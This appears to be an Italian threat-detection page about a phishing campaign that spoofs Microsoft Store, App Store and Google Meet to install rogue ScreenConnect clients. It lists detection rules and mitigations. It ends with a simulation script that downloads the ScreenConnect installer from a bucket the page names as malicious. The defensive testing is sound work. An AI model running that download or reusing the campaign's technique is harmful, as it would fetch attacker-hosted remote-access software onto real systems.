Diffusione di ScreenConnect su Larga Scala Tramite Phishing a Tema App Store
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Una campagna di phishing su larga scala sta utilizzando tecniche avanzate di ingegneria sociale per distribuire client ConnectWise ScreenConnect non autorizzati. Gli attaccanti si spacciano per servizi affidabili come Microsoft Store, Apple App Store e Google Meet attraverso contenuti web dinamici e avvisi di aggiornamento fraudolenti. Una volta installato, il software RMM offre agli attori delle minacce accesso remoto persistente ai sistemi compromessi.
Indagine
Il team LevelBlue OpsCTI ha scoperto la campagna attraverso l’analisi di un framework di phishing di aggiornamenti falsi e infrastrutture riutilizzate. I ricercatori hanno identificato strutture di directory coerenti, hash di risorse HTTP ricorrenti e script assistiti dall’IA utilizzati per profilare potenziali vittime. L’indagine ha anche rivelato l’abuso delle API dei Bot di Telegram per la telemetria in tempo reale e la segnalazione delle infezioni.
Mitigazione
Le organizzazioni dovrebbero dare la priorità al rilevamento di software RMM non autorizzato e monitorare i download eseguibili da servizi cloud pubblici sconosciuti come Amazon S3 o Cloudflare R2. Sono inoltre raccomandati controlli per identificare la contraffazione dei marchi e il traffico API non autorizzato di Telegram Bot. Revisioni regolari dell’inventario degli endpoint possono aiutare a scoprire installazioni ScreenConnect non autorizzate e compromissioni esistenti.
Risposta
Se si sospetta una compromissione, i sistemi interessati dovrebbero essere isolati immediatamente e qualsiasi client ScreenConnect comunicante con istanze di relay non autorizzate dovrebbe essere indagato. I log di rete dovrebbero essere esaminati per connessioni sospette a domini di phishing noti o endpoint di archiviazione cloud pubblica. Gli analisti dovrebbero anche esaminare i processi avviati da msiexec.exe o PowerShell che scaricano file da fonti esterne.
Flusso di Attacco
Rilevamenti
Possibilità di Esecuzione tramite Linee di Comando PowerShell Nascoste (via cmdline)
Proof of Value
Richiamare Metodi .NET Sospetti da PowerShell (via powershell)
Proof of Value
Possibile Esecuzione di Msiexec di File in Directory Non Comune (via cmdline)
Proof of Value
Software di Accesso/ Gestione Remota Alternativa (via process_creation)
Proof of Value
Possibile Abuso di Dominio di Sviluppo Cloudflare (via dns)
Proof of Value
Comando e Controllo Sospetti tramite Richiesta DNS con Un Dominio di Livello Superiore Insolito (TLD) (via dns)
Proof of Value
Indicatori di Compromissione (HashSha256) da rilevare: Oltre ‘Aggiornamenti Falsi’: Dal Phishing a Tema App Store alla Distribuzione su Larga Scala di ScreenConnect
Proof of Value
Indicatori di Compromissione (SourceIP) da rilevare: Oltre ‘Aggiornamenti Falsi’: Dal Phishing a Tema App Store alla Distribuzione su Larga Scala di ScreenConnect
Proof of Value
Indicatori di Compromissione (DestinationIP) da rilevare: Oltre ‘Aggiornamenti Falsi’: Dal Phishing a Tema App Store alla Distribuzione su Larga Scala di ScreenConnect
Proof of Value
Esecuzione di Installazioni ScreenConnect Non Autorizzate tramite Phishing [Creazione Processo Windows]
Proof of Value
Rilevare il Download dell’Installer di ScreenConnect da Bucket S3 Sospetti [AWS Cloudtrail]
Proof of Value
Esecuzione di Simulazione
Prerequisito: La Verifica di Base della Telemetria & Pre-volo deve essere superata.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non pertinenti porteranno a diagnosi errate.
-
Narrativa dell’Attacco & Comandi: Un attaccante ha stabilito una campagna di phishing. Per evitare il rilevamento da parte dell’antivirus basato su file, ospitano uno strumento di accesso remoto legittimo (ScreenConnect) su un bucket AWS S3 pubblico che imita la distribuzione legittima di software. L’attaccante istruisce una vittima a scaricare l’installer. Questa azione attiva un
GetObjectevento in AWS CloudTrail, mirato allo specifico bucket malevoloeobtdk.s3.us-east-2.amazonaws.come il nome del file specificoScreenConnect.ClientSetup.msi. -
Script di Test di Regressione: [Note: Since we cannot interact with real malicious buckets, this script simulates the richiesta che genererebbe la voce di log se il bucket esistesse.]
#!/bin/bash # Script di simulazione per attivare la regola di rilevamento CloudTrail # Questo imita la chiamata API che un avversario farebbe per scaricare lo strumento echo "[+] Avvio della Simulazione: Download di ScreenConnect da S3 Malevolo..." # Usiamo l'AWS CLI per tentare una richiesta GET. # Anche se il bucket non esiste, il tentativo di 'richiesta' genera l'evento CloudTrail # in un ambiente reale dove il bucket è configurato. aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2 echo "[+] Comando di simulazione inviato. Controllare CloudTrail per eventi GetObject che mirano a 'eobtdk.s3.us-east-2.amazonaws.com'." -
Comandi di Pulizia:
# Rimuovere eventuali file scaricati durante la simulazione rm -f ScreenConnect.ClientSetup.msi